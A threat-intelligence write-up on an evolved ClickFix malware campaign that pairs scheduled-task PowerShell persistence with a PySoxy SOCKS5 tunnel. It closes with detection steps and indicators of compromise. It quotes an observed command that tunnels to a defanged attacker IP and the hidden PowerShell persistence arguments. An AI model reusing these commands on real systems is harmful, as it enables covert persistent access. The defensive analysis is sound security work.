Evolution of the ClickFix Campaign: Multi-Layered Persistence and Python-Based Proxying
The landscape of social engineering-driven malware is shifting from opportunistic, single-stage infections to sophisticated, multi-layered intrusion chains. A recently observed evolution of the ClickFix campaign demonstrates this trend, moving beyond simple user-triggered execution toward a resilient model of persistent access.
Central to this new strategy is the repurposing of PySoxy, a decade-old open-source Python SOCKS5 proxy, to establish secondary command-and-control (C2) channels.
Unlike legacy ClickFix attacks that typically terminate after a single PowerShell execution, this modern iteration builds a tiered access architecture. A single user error—often involving the execution of an obfuscated PowerShell command via explorer.exe on a compromised site—now serves as the catalyst for a complex chain involving persistence, lateral reconnaissance, and redundant C2 communications.
Researchers at ReliaQuest uncovered this activity in April 2026, marking a significant milestone in the campaign’s lifecycle. This represents the first documented instance where ClickFix integrates scheduled task persistence with Python-based encrypted proxying to maintain long-term, stealthy access within a target environment.
The Infection Chain: From Initial Access to In-Memory RAT
The attack lifecycle begins with a social engineering lure. Upon visiting a compromised website, the victim is coerced into running a malicious PowerShell command. While the initial entry vector mimics known ClickFix patterns, the post-exploitation behavior is considerably more advanced than previous iterations.
Instead of deploying a traditional executable, the command fetches and executes a staged PowerShell script that functions as a lightweight, fileless Remote Access Trojan (RAT). This script maintains a low profile by operating primarily in memory, communicating with attacker infrastructure every few seconds to retrieve instructions and return results without leaving a significant forensic footprint on the local disk.
To ensure the intrusion survives reboots or process termination, the attacker establishes persistence via a Windows Scheduled Task. This task is configured to re-execute the malicious script approximately every 40 minutes using highly stealthy, non-interactive arguments:
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden
This recurring heartbeat transforms what would have been a transient infection into a permanent foothold, allowing the attacker to maintain presence even if the primary C2 connection is severed.
Reconnaissance and Network Mapping
Once persistence is secured, the attacker shifts to the discovery phase. Rather than introducing noisy, third-party scanning tools, the actor leverages “living-off-the-land” (LotL) techniques. By utilizing built-in Windows utilities, the attacker enumerates user privileges, identifies domain roles, and locates domain controllers. The combination of LDAP queries and SMB interactions allows the actor to map the internal network topology effectively.
This phase is a critical intelligence-gathering step, confirming whether the compromised host possesses the requisite permissions to support lateral movement and helping the attacker identify high-value targets for subsequent exploitation.
The PySoxy Pivot: Encrypted Proxying via Python
In a sophisticated move to bypass network-level defenses, the attacker introduces PySoxy. The tool is delivered as a compiled Python bytecode file (.pyc) and staged within the ProgramData directory. When executed via a legitimate python.exe runtime, PySoxy establishes an encrypted SOCKS5 proxy tunnel back to the attacker’s infrastructure over port 443.
A representative command string observed in the wild includes:
python.exe b64.pyc -ssl -remote_port 443 -remote_ip 167.99.158[.]97
This step fundamentally alters the risk profile of the attack. By implementing a second, independent access channel via proxy traffic, the attacker can blend in with legitimate, encrypted HTTPS traffic. Because the traffic is wrapped in SSL, traditional Deep Packet Inspection (DPI) may struggle to differentiate this C2 activity from standard web browsing.
A Critical Warning for Defenders: Observations revealed that simply blocking outbound C2 connections is insufficient for containment. In monitored cases, even when both C2 channels were blocked by security controls, the scheduled task continued to attempt re-execution for hours. This underscores a vital lesson: network-layer containment must be paired with endpoint-layer remediation.
Detection and Mitigation Strategies
The modularity of this campaign—combining PowerShell execution, scheduled tasks, and Python runtimes—means that each individual action might appear benign in isolation. Detection requires a correlation-based approach.
Security Operations Centers (SOC) and incident responders should prioritize the following actions:
- Endpoint Isolation: Isolate suspected hosts immediately. Relying solely on IP/domain blocking is insufficient due to the persistent local tasks.
- Scheduled Task Audit: Scrutinize all tasks created around the time of suspicious alerts, specifically looking for
powershell.exewith-WindowStyle Hiddenor-ExecutionPolicy Bypass. - Directory Analysis: Conduct hunts within
C:\ProgramDatafor anomalous.pycfiles or staged scripts. - Python Process Monitoring: Monitor for unusual command-line arguments in
python.exe, specifically looking for flags like-ssl,-remote_ip, or-remote_port. - Behavioral Correlation: Link PowerShell-to-Python execution chains to identify the transition from initial access to proxy establishment.
This campaign signals a maturation of the ClickFix threat actor. By adopting a “bring your own interpreter” strategy and repurposing legacy open-source tools, attackers are successfully evading signature-based detection and complicating the recovery process.
Indicators of Compromise (IOCs)
| Network Indicators | Infrastructure Details | ||
|---|---|---|---|
| IP Address | 185.205.211[.]217 (ClickFix Infra) | Domain | strapness[.]com (Stager) |
| IP Address | 206.206.103[.]120 (PowerShell C2) | Domain | abledom[.]net (Secondary C2) |
| IP Address | 206.206.103[.]106 (Staging/Exfil) | Domain | overlateise[.]com (Malicious Script Host) |
| IP Address | 167.99.158[.]97 (PySoxy Destination) | ||
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your internal SIEM.